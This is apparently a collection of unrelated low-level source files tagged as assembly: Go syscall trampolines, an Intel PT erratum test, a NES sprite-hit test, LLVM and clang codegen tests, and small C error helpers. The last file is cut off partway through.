TEXT ·libc_getpid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpid(SB)
TEXT ·libc_getppid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getppid(SB)
TEXT ·libc_getpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpriority(SB)
TEXT ·libc_getrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrlimit(SB)
TEXT ·libc_getrusage_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrusage(SB)
TEXT ·libc_getsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsid(SB)
TEXT ·libc_getuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getuid(SB)
TEXT ·libc_issetugid_trampoline(SB),NOSPLIT,$0-0
JMP libc_issetugid(SB)
TEXT ·libc_kqueue_trampoline(SB),NOSPLIT,$0-0
JMP libc_kqueue(SB)
TEXT ·libc_lchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_lchown(SB)
TEXT ·libc_link_trampoline(SB),NOSPLIT,$0-0
JMP libc_link(SB)
TEXT ·libc_linkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_linkat(SB)
TEXT ·libc_listen_trampoline(SB),NOSPLIT,$0-0
JMP libc_listen(SB)
TEXT ·libc_mkdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdir(SB)
TEXT ·libc_mkdirat_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdirat(SB)
TEXT ·libc_mkfifo_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkfifo(SB)
TEXT ·libc_mknod_trampoline(SB),NOSPLIT,$0-0
JMP libc_mknod(SB)
TEXT ·libc_open_trampoline(SB),NOSPLIT,$0-0
JMP libc_open(SB)
TEXT ·libc_openat_trampoline(SB),NOSPLIT,$0-0
JMP libc_openat(SB)
TEXT ·libc_pathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_pathconf(SB)
TEXT ·libc_pread_trampoline(SB),NOSPLIT,$0-0
JMP libc_pread(SB)
TEXT ·libc_pwrite_trampoline(SB),NOSPLIT,$0-0
JMP libc_pwrite(SB)
TEXT ·libc_read_trampoline(SB),NOSPLIT,$0-0
JMP libc_read(SB)
TEXT ·libc_readlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlink(SB)
TEXT ·libc_readlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlinkat(SB)
TEXT ·libc_rename_trampoline(SB),NOSPLIT,$0-0
JMP libc_rename(SB)
TEXT ·libc_renameat_trampoline(SB),NOSPLIT,$0-0
JMP libc_renameat(SB)
TEXT ·libc_revoke_trampoline(SB),NOSPLIT,$0-0
JMP libc_revoke(SB)
TEXT ·libc_rmdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_rmdir(SB)
TEXT ·libc_lseek_trampoline(SB),NOSPLIT,$0-0
JMP libc_lseek(SB)
TEXT ·libc_select_trampoline(SB),NOSPLIT,$0-0
JMP libc_select(SB)
TEXT ·libc_setegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setegid(SB)
TEXT ·libc_seteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_seteuid(SB)
TEXT ·libc_setgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgid(SB)
TEXT ·libc_setlogin_trampoline(SB),NOSPLIT,$0-0
JMP libc_setlogin(SB)
TEXT ·libc_setpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpgid(SB)
TEXT ·libc_setpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpriority(SB)
TEXT ·libc_setprivexec_trampoline(SB),NOSPLIT,$0-0
JMP libc_setprivexec(SB)
TEXT ·libc_setregid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setregid(SB)
TEXT ·libc_setreuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setreuid(SB)
TEXT ·libc_setrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_setrlimit(SB)
TEXT ·libc_setsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsid(SB)
TEXT ·libc_settimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_settimeofday(SB)
TEXT ·libc_setuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setuid(SB)
TEXT ·libc_symlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlink(SB)
TEXT ·libc_symlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlinkat(SB)
TEXT ·libc_sync_trampoline(SB),NOSPLIT,$0-0
JMP libc_sync(SB)
TEXT ·libc_truncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_truncate(SB)
TEXT ·libc_umask_trampoline(SB),NOSPLIT,$0-0
JMP libc_umask(SB)
TEXT ·libc_undelete_trampoline(SB),NOSPLIT,$0-0
JMP libc_undelete(SB)
TEXT ·libc_unlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlink(SB)
TEXT ·libc_unlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlinkat(SB)
TEXT ·libc_unmount_trampoline(SB),NOSPLIT,$0-0
JMP libc_unmount(SB)
TEXT ·libc_write_trampoline(SB),NOSPLIT,$0-0
JMP libc_write(SB)
TEXT ·libc_mmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_mmap(SB)
TEXT ·libc_munmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_munmap(SB)
TEXT ·libc_gettimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_gettimeofday(SB)
TEXT ·libc_fstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstat64(SB)
TEXT ·libc_fstatat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatat64(SB)
TEXT ·libc_fstatfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatfs64(SB)
TEXT ·libc___getdirentries64_trampoline(SB),NOSPLIT,$0-0
JMP libc___getdirentries64(SB)
TEXT ·libc_getfsstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_getfsstat64(SB)
TEXT ·libc_lstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_lstat64(SB)
TEXT ·libc_stat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_stat64(SB)
TEXT ·libc_statfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_statfs64(SB)
| {
"language": "Assembly"
} |
; Copyright (c) 2015-2020, Intel Corporation
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions are met:
;
; * Redistributions of source code must retain the above copyright notice,
; this list of conditions and the following disclaimer.
; * Redistributions in binary form must reproduce the above copyright notice,
; this list of conditions and the following disclaimer in the documentation
; and/or other materials provided with the distribution.
; * Neither the name of Intel Corporation nor the names of its contributors
; may be used to endorse or promote products derived from this software
; without specific prior written permission.
;
; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
; ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
; LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
; CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
; SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
; INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
; CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
; ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
; POSSIBILITY OF SUCH DAMAGE.
; SKD010: Intel(R) PT FUP May be Dropped After OVF.
;
; Some Intel PT (Intel Processor Trace) OVF (Overflow) packets may not
; be followed by a FUP (Flow Update Packet) or TIP.PGE (Target IP
; Packet, Packet Generation Enable).
;
; cpu 6/78
; cpu 6/94
; cpu 6/142
; cpu 6/158
; cpu 6/165
; cpu 6/166
;
; Variant: Missing FUP, sync at MODE.TSX + FUP.
;
org 0x1000
bits 64
; @pt p0: psb()
; @pt p1: mode.exec(64bit)
; @pt p2: psbend()
; @pt p3: ovf()
; fup missing
; @pt p4: mode.tsx(begin)
; @pt p5: fup(3: %l0)
l0: nop
; @pt p6: fup(1: %l1)
; @pt p7: tip.pgd(0: %l2)
l1: nop
l2: hlt
; @pt .exp(ptdump)
;%0p0 psb
;%0p1 mode.exec cs.l
;%0p2 psbend
;%0p3 ovf
;%0p4 mode.tsx intx
;%0p5 fup 3: %?l0
;%0p6 fup 1: %?l1.2
;%0p7 tip.pgd 0: %?l2.0
; @pt .exp(ptxed)
;[overflow]
;[begin transaction]
;? %0l0
;[disabled]
| {
"language": "Assembly"
} |
; Tests basic sprite 0 hit double-height operation.
.include "prefix_sprite_hit.a"
test_name:
.db "SPRITE HIT DOUBLE HEIGHT",0
.code
reset:
jsr begin_sprite_hit_tests
lda #$20 ; double-height sprites
sta $2000
; Single solid tile in middle of screen
lda #$21
ldx #$f0
jsr set_vaddr
lda #solid_tile
sta $2007
lda #0
sta sprite_attr
lda #0 ; tiles 0 and 1
sta sprite_tile
ldx #128
ldy #119
jsr set_sprite_xy
lda #2;) Lower sprite tile should miss bottom of bg tile
ldx #$18
jsr sprite_should_miss
ldx #128
ldy #118
jsr set_sprite_xy
lda #3;) Lower sprite tile should hit bottom of bg tile
ldx #$18
jsr sprite_should_hit
ldx #128
ldy #103
jsr set_sprite_xy
lda #3;) Lower sprite tile should miss top of bg tile
ldx #$18
jsr sprite_should_miss
ldx #128
ldy #104
jsr set_sprite_xy
lda #4;) Lower sprite tile should hit top of bg tile
ldx #$18
jsr sprite_should_hit
jmp tests_passed
| {
"language": "Assembly"
} |
; RUN: opt < %s -pgo-icall-prom -S | FileCheck %s --check-prefix=ICALL-PROM
; RUN: opt < %s -passes=pgo-icall-prom -S | FileCheck %s --check-prefix=ICALL-PROM
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"
@foo = common global i32 (i32, ...)* null, align 8
define i32 @va_func(i32 %num, ...) {
entry:
ret i32 0
}
define i32 @bar() #1 {
entry:
%tmp = load i32 (i32, ...)*, i32 (i32, ...)** @foo, align 8
; ICALL-PROM: [[CMP:%[0-9]+]] = icmp eq i32 (i32, ...)* %tmp, @va_func
; ICALL-PROM: br i1 [[CMP]], label %if.true.direct_targ, label %if.false.orig_indirect, !prof [[BRANCH_WEIGHT:![0-9]+]]
; ICALL-PROM:if.true.direct_targ:
; ICALL-PROM: [[DIRCALL_RET:%[0-9]+]] = call i32 (i32, ...) @va_func(i32 3, i32 12, i32 22, i32 4)
; ICALL-PROM: br label %if.end.icp
%call = call i32 (i32, ...) %tmp(i32 3, i32 12, i32 22, i32 4), !prof !1
; ICALL-PROM:if.false.orig_indirect:
; ICALL-PROM: %call = call i32 (i32, ...) %tmp(i32 3, i32 12, i32 22, i32 4)
; ICALL-PROM: br label %if.end.icp
ret i32 %call
; ICALL-PROM:if.end.icp:
; ICALL-PROM: [[PHI_RET:%[0-9]+]] = phi i32 [ %call, %if.false.orig_indirect ], [ [[DIRCALL_RET]], %if.true.direct_targ ]
; ICALL-PROM: ret i32 [[PHI_RET]]
}
!1 = !{!"VP", i32 0, i64 12345, i64 989055279648259519, i64 12345}
; ICALL-PROM: [[BRANCH_WEIGHT]] = !{!"branch_weights", i32 12345, i32 0}
| {
"language": "Assembly"
} |
/*
* CDDL HEADER START
*
* This file and its contents are supplied under the terms of the
* Common Development and Distribution License ("CDDL"), version 1.0.
* You may only use this file in accordance with the terms of version
* 1.0 of the CDDL.
*
* A full copy of the text of the CDDL should have accompanied this
* source. A copy of the CDDL is also available via the Internet at
* http://www.illumos.org/license/CDDL.
*
* When distributing Covered Code, include this CDDL HEADER in each
* file and include the License file at usr/src/SYSTEMXVI.LICENSE.
* If applicable, add the following below this CDDL HEADER, with the
* fields enclosed by brackets "[]" replaced with your own identifying
* information: Portions Copyright [yyyy] [name of copyright owner]
*
* CDDL HEADER END
*/
/*
* Copyright 2020 David MacKay. All rights reserved.
* Use is subject to license terms.
*/
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
void perror_fatal (const char * str)
{
perror (str);
exit (EXIT_FAILURE);
}
void error_fatal (const char * fmt, ...)
{
va_list args;
va_start (args, fmt);
vfprintf (stderr, fmt, args);
va_end (args);
exit (EXIT_FAILURE);
} | {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for arm, Linux
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
B syscall·Syscall6(SB)
TEXT ·SyscallNoError(SB),NOSPLIT,$0-24
BL runtime·entersyscall(SB)
MOVW trap+0(FP), R7
MOVW a1+4(FP), R0
MOVW a2+8(FP), R1
MOVW a3+12(FP), R2
MOVW $0, R3
MOVW $0, R4
MOVW $0, R5
SWI $0
MOVW R0, r1+16(FP)
MOVW $0, R0
MOVW R0, r2+20(FP)
BL runtime·exitsyscall(SB)
RET
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
B syscall·RawSyscall6(SB)
TEXT ·RawSyscallNoError(SB),NOSPLIT,$0-24
MOVW trap+0(FP), R7 // syscall entry
MOVW a1+4(FP), R0
MOVW a2+8(FP), R1
MOVW a3+12(FP), R2
SWI $0
MOVW R0, r1+16(FP)
MOVW $0, R0
MOVW R0, r2+20(FP)
RET
TEXT ·seek(SB),NOSPLIT,$0-28
B syscall·seek(SB)
| {
"language": "Assembly"
} |
// RUN: %clang_cc1 -triple x86_64-unknown-unknown -w -S -o - -emit-llvm %s | FileCheck %s -check-prefix=NO__ERRNO
// RUN: %clang_cc1 -triple x86_64-unknown-unknown -w -S -o - -emit-llvm -fmath-errno %s | FileCheck %s -check-prefix=HAS_ERRNO
// RUN: %clang_cc1 -triple x86_64-unknown-unknown-gnu -w -S -o - -emit-llvm -fmath-errno %s | FileCheck %s --check-prefix=HAS_ERRNO_GNU
// RUN: %clang_cc1 -triple x86_64-unknown-unknown-android -w -S -o - -emit-llvm -fmath-errno %s | FileCheck %s --check-prefix=HAS_ERRNO_ANDROID
// RUN: %clang_cc1 -triple x86_64-unknown-windows-msvc -w -S -o - -emit-llvm -fmath-errno %s | FileCheck %s --check-prefix=HAS_ERRNO_WIN
// Test attributes and codegen of math builtins.
void foo(double *d, float f, float *fp, long double *l, int *i, const char *c) {
f = __builtin_fmod(f,f); f = __builtin_fmodf(f,f); f = __builtin_fmodl(f,f);
// NO__ERRNO: frem double
// NO__ERRNO: frem float
// NO__ERRNO: frem x86_fp80
// HAS_ERRNO: declare double @fmod(double, double) [[NOT_READNONE:#[0-9]+]]
// HAS_ERRNO: declare float @fmodf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @fmodl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_atan2(f,f); __builtin_atan2f(f,f) ; __builtin_atan2l(f, f);
// NO__ERRNO: declare double @atan2(double, double) [[READNONE:#[0-9]+]]
// NO__ERRNO: declare float @atan2f(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @atan2l(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @atan2(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @atan2f(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @atan2l(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_copysign(f,f); __builtin_copysignf(f,f); __builtin_copysignl(f,f); __builtin_copysignf128(f,f);
// NO__ERRNO: declare double @llvm.copysign.f64(double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// NO__ERRNO: declare float @llvm.copysign.f32(float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.copysign.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare fp128 @llvm.copysign.f128(fp128, fp128) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.copysign.f64(double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// HAS_ERRNO: declare float @llvm.copysign.f32(float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.copysign.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare fp128 @llvm.copysign.f128(fp128, fp128) [[READNONE_INTRINSIC]]
__builtin_fabs(f); __builtin_fabsf(f); __builtin_fabsl(f); __builtin_fabsf128(f);
// NO__ERRNO: declare double @llvm.fabs.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.fabs.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.fabs.f80(x86_fp80) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare fp128 @llvm.fabs.f128(fp128) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.fabs.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.fabs.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.fabs.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare fp128 @llvm.fabs.f128(fp128) [[READNONE_INTRINSIC]]
__builtin_frexp(f,i); __builtin_frexpf(f,i); __builtin_frexpl(f,i);
// NO__ERRNO: declare double @frexp(double, i32*) [[NOT_READNONE:#[0-9]+]]
// NO__ERRNO: declare float @frexpf(float, i32*) [[NOT_READNONE]]
// NO__ERRNO: declare x86_fp80 @frexpl(x86_fp80, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare double @frexp(double, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare float @frexpf(float, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @frexpl(x86_fp80, i32*) [[NOT_READNONE]]
__builtin_huge_val(); __builtin_huge_valf(); __builtin_huge_vall(); __builtin_huge_valf128();
// NO__ERRNO-NOT: .huge
// NO__ERRNO-NOT: @huge
// HAS_ERRNO-NOT: .huge
// HAS_ERRNO-NOT: @huge
__builtin_inf(); __builtin_inff(); __builtin_infl(); __builtin_inff128();
// NO__ERRNO-NOT: .inf
// NO__ERRNO-NOT: @inf
// HAS_ERRNO-NOT: .inf
// HAS_ERRNO-NOT: @inf
__builtin_ldexp(f,f); __builtin_ldexpf(f,f); __builtin_ldexpl(f,f);
// NO__ERRNO: declare double @ldexp(double, i32) [[READNONE]]
// NO__ERRNO: declare float @ldexpf(float, i32) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @ldexpl(x86_fp80, i32) [[READNONE]]
// HAS_ERRNO: declare double @ldexp(double, i32) [[NOT_READNONE]]
// HAS_ERRNO: declare float @ldexpf(float, i32) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @ldexpl(x86_fp80, i32) [[NOT_READNONE]]
__builtin_modf(f,d); __builtin_modff(f,fp); __builtin_modfl(f,l);
// NO__ERRNO: declare double @modf(double, double*) [[NOT_READNONE]]
// NO__ERRNO: declare float @modff(float, float*) [[NOT_READNONE]]
// NO__ERRNO: declare x86_fp80 @modfl(x86_fp80, x86_fp80*) [[NOT_READNONE]]
// HAS_ERRNO: declare double @modf(double, double*) [[NOT_READNONE]]
// HAS_ERRNO: declare float @modff(float, float*) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @modfl(x86_fp80, x86_fp80*) [[NOT_READNONE]]
__builtin_nan(c); __builtin_nanf(c); __builtin_nanl(c); __builtin_nanf128(c);
// NO__ERRNO: declare double @nan(i8*) [[PURE:#[0-9]+]]
// NO__ERRNO: declare float @nanf(i8*) [[PURE]]
// NO__ERRNO: declare x86_fp80 @nanl(i8*) [[PURE]]
// NO__ERRNO: declare fp128 @nanf128(i8*) [[PURE]]
// HAS_ERRNO: declare double @nan(i8*) [[PURE:#[0-9]+]]
// HAS_ERRNO: declare float @nanf(i8*) [[PURE]]
// HAS_ERRNO: declare x86_fp80 @nanl(i8*) [[PURE]]
// HAS_ERRNO: declare fp128 @nanf128(i8*) [[PURE]]
__builtin_nans(c); __builtin_nansf(c); __builtin_nansl(c); __builtin_nansf128(c);
// NO__ERRNO: declare double @nans(i8*) [[PURE]]
// NO__ERRNO: declare float @nansf(i8*) [[PURE]]
// NO__ERRNO: declare x86_fp80 @nansl(i8*) [[PURE]]
// NO__ERRNO: declare fp128 @nansf128(i8*) [[PURE]]
// HAS_ERRNO: declare double @nans(i8*) [[PURE]]
// HAS_ERRNO: declare float @nansf(i8*) [[PURE]]
// HAS_ERRNO: declare x86_fp80 @nansl(i8*) [[PURE]]
// HAS_ERRNO: declare fp128 @nansf128(i8*) [[PURE]]
__builtin_pow(f,f); __builtin_powf(f,f); __builtin_powl(f,f);
// NO__ERRNO: declare double @llvm.pow.f64(double, double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.pow.f32(float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.pow.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @pow(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @powf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @powl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_powi(f,f); __builtin_powif(f,f); __builtin_powil(f,f);
// NO__ERRNO: declare double @llvm.powi.f64(double, i32) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.powi.f32(float, i32) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.powi.f80(x86_fp80, i32) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.powi.f64(double, i32) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.powi.f32(float, i32) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.powi.f80(x86_fp80, i32) [[READNONE_INTRINSIC]]
/* math */
__builtin_acos(f); __builtin_acosf(f); __builtin_acosl(f);
// NO__ERRNO: declare double @acos(double) [[READNONE]]
// NO__ERRNO: declare float @acosf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @acosl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @acos(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @acosf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @acosl(x86_fp80) [[NOT_READNONE]]
__builtin_acosh(f); __builtin_acoshf(f); __builtin_acoshl(f);
// NO__ERRNO: declare double @acosh(double) [[READNONE]]
// NO__ERRNO: declare float @acoshf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @acoshl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @acosh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @acoshf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @acoshl(x86_fp80) [[NOT_READNONE]]
__builtin_asin(f); __builtin_asinf(f); __builtin_asinl(f);
// NO__ERRNO: declare double @asin(double) [[READNONE]]
// NO__ERRNO: declare float @asinf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @asinl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @asin(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @asinf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @asinl(x86_fp80) [[NOT_READNONE]]
__builtin_asinh(f); __builtin_asinhf(f); __builtin_asinhl(f);
// NO__ERRNO: declare double @asinh(double) [[READNONE]]
// NO__ERRNO: declare float @asinhf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @asinhl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @asinh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @asinhf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @asinhl(x86_fp80) [[NOT_READNONE]]
__builtin_atan(f); __builtin_atanf(f); __builtin_atanl(f);
// NO__ERRNO: declare double @atan(double) [[READNONE]]
// NO__ERRNO: declare float @atanf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @atanl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @atan(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @atanf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @atanl(x86_fp80) [[NOT_READNONE]]
__builtin_atanh(f); __builtin_atanhf(f); __builtin_atanhl(f);
// NO__ERRNO: declare double @atanh(double) [[READNONE]]
// NO__ERRNO: declare float @atanhf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @atanhl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @atanh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @atanhf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @atanhl(x86_fp80) [[NOT_READNONE]]
__builtin_cbrt(f); __builtin_cbrtf(f); __builtin_cbrtl(f);
// NO__ERRNO: declare double @cbrt(double) [[READNONE]]
// NO__ERRNO: declare float @cbrtf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @cbrtl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @cbrt(double) [[READNONE:#[0-9]+]]
// HAS_ERRNO: declare float @cbrtf(float) [[READNONE]]
// HAS_ERRNO: declare x86_fp80 @cbrtl(x86_fp80) [[READNONE]]
__builtin_ceil(f); __builtin_ceilf(f); __builtin_ceill(f);
// NO__ERRNO: declare double @llvm.ceil.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.ceil.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.ceil.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.ceil.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.ceil.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.ceil.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_cos(f); __builtin_cosf(f); __builtin_cosl(f);
// NO__ERRNO: declare double @llvm.cos.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.cos.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.cos.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @cos(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @cosf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @cosl(x86_fp80) [[NOT_READNONE]]
__builtin_cosh(f); __builtin_coshf(f); __builtin_coshl(f);
// NO__ERRNO: declare double @cosh(double) [[READNONE]]
// NO__ERRNO: declare float @coshf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @coshl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @cosh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @coshf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @coshl(x86_fp80) [[NOT_READNONE]]
__builtin_erf(f); __builtin_erff(f); __builtin_erfl(f);
// NO__ERRNO: declare double @erf(double) [[READNONE]]
// NO__ERRNO: declare float @erff(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @erfl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @erf(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @erff(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @erfl(x86_fp80) [[NOT_READNONE]]
__builtin_erfc(f); __builtin_erfcf(f); __builtin_erfcl(f);
// NO__ERRNO: declare double @erfc(double) [[READNONE]]
// NO__ERRNO: declare float @erfcf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @erfcl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @erfc(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @erfcf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @erfcl(x86_fp80) [[NOT_READNONE]]
__builtin_exp(f); __builtin_expf(f); __builtin_expl(f);
// NO__ERRNO: declare double @llvm.exp.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.exp.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.exp.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @exp(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @expf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @expl(x86_fp80) [[NOT_READNONE]]
__builtin_exp2(f); __builtin_exp2f(f); __builtin_exp2l(f);
// NO__ERRNO: declare double @llvm.exp2.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.exp2.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.exp2.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @exp2(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @exp2f(float) [[NOT_READNONE]]
